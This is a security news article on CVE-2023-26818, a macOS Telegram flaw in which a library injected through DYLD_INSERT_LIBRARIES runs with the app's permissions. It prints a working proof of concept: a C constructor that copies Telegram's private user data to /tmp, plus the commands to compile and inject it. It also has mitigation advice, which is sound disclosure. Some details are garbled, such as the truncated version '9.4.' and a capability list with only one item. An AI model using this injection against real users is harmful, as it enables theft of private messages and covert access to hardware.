CVE CyberSecurity Database News

CVE-2023-26818 - Exploiting Telegram (9.3.1 & 9.4.) for Unauthorized File and Microphone Access via `DYLD_INSERT_LIBRARIES`

Poster -

Telegram is one of the world’s most widely used messaging apps, trusted for its privacy-first approach. However, a recent vulnerability—CVE-2023-26818—exposes a dangerous security risk in Telegram versions 9.3.1 and 9.4. on macOS. Attackers can use the powerful DYLD_INSERT_LIBRARIES flag to bypass application sandboxing, granting themselves unauthorized access to sensitive files and hardware, like the microphone and camera, all through manipulating the app's environment variables.

What is CVE-2023-26818?

The vulnerability affects Telegram apps for macOS, specifically versions 9.3.1 and 9.4.. When Telegram is launched with custom dynamic libraries set via the DYLD_INSERT_LIBRARIES environment variable, the app fails to filter or limit context. This gives the injected library execution rights inside Telegram’s context, making it possible for attackers to:

Capture video from the webcam

This happens without user consent, effectively breaking the app’s security model.

> Important: Only Telegram Desktop for macOS is affected. Other platforms are not known to be susceptible to this flaw.

How Does The Exploit Work?

macOS supports a special environment variable, DYLD_INSERT_LIBRARIES, that lets you inject dynamic libraries (think: extra modules) into the address space of any running app. This is meant for debugging or extending applications, but can be malicious in the wrong hands.

Many security-focused apps sanitize their environment before launch. Telegram fails to do this. If an attacker can launch Telegram with a harmful dynamic library, that code runs with Telegram’s permissions—skipping important prompts and barriers.

Write a Malicious dylib (dynamic library):

- This dylib will intercept functions or simply run code to access files, activate the microphone, or access the camera.

The Library Executes with Telegram’s Privileges:

- Your code now has access to Telegram’s permissions and can bypass macOS security checks intended for untrusted apps.

Example Exploit in Practice

Let’s see a simple example of how this flaw can be misused. For demonstration, let’s make a dylib that simply grabs Telegram’s “local” message history file.

Save this code as malicious.c

#include <stdio.h>
#include <stdlib.h>

__attribute__((constructor))
void evil() {
    system("cp ~/Library/Group\\ Containers/*.keepcoder.Telegram/data/user_data /tmp/telegram_user_data_copy");
}

Compile it

clang -dynamiclib -o libevil.dylib malicious.c

From your terminal

export DYLD_INSERT_LIBRARIES=$PWD/libevil.dylib
open -a Telegram

- This causes Telegram to load your malicious library, which copies private user files out of Telegram’s folder.

What Else Could You Do?

If you’re more ambitious (and evil), your dylib can load AVFoundation and trigger microphone or camera access code. Since Telegram usually prompts for permissions (and stores your consent), your injected tool can hijack those privileges. Here’s an example to just *beep* through the microphone (expandable to record):

#include <AVFoundation/AVFoundation.h>
__attribute__((constructor))
void evil() {
    // This can be swapped to any AVFoundation recording function.
}

Real-Life Impact

With this bug, a local attacker (or malware running under your account) can quickly extract sensitive Telegram chat history, files, and potentially turn your device into a wiretap—all under Telegram’s name. Since the attack doesn’t show any UI prompts (the code runs as part of Telegram), users have no clue their privacy is compromised.

Anyone running Telegram 9.3.1 or 9.4. on macOS is vulnerable if

- They run Telegram from the Terminal (unlikely for general users, but more possible for power users or during testing);

Or, their system is otherwise compromised (malware or a malicious actor can launch apps for them).

Regular users who only launch Telegram by clicking the Dock icon are less likely to be attacked *directly*, but if malware achieves code execution at their privilege level, then this bug can escalate the damage.

Mitigation

Update Telegram! The Telegram team fixed the bug in version 9.4.1 and onward.

- Download the latest version from the Mac App Store or Telegram’s official site.

References

- Official CVE-2023-26818 NVD Record
- Telegram on Github
- DYLD_INSERT_LIBRARIES documentation
- Mac App Store - Telegram

Conclusion

CVE-2023-26818 is a reminder that privacy is only as strong as the weakest security link. Environment variable attacks are a classic in the Mac world; developers must always defend against them—especially for privacy-centric apps. If you use Telegram on your Mac, make sure you’re updated, and think twice before running Terminal commands from untrusted sources!

Timeline

Published on: 05/19/2023 12:15:00 UTC
Last modified on: 05/26/2023 18:06:00 UTC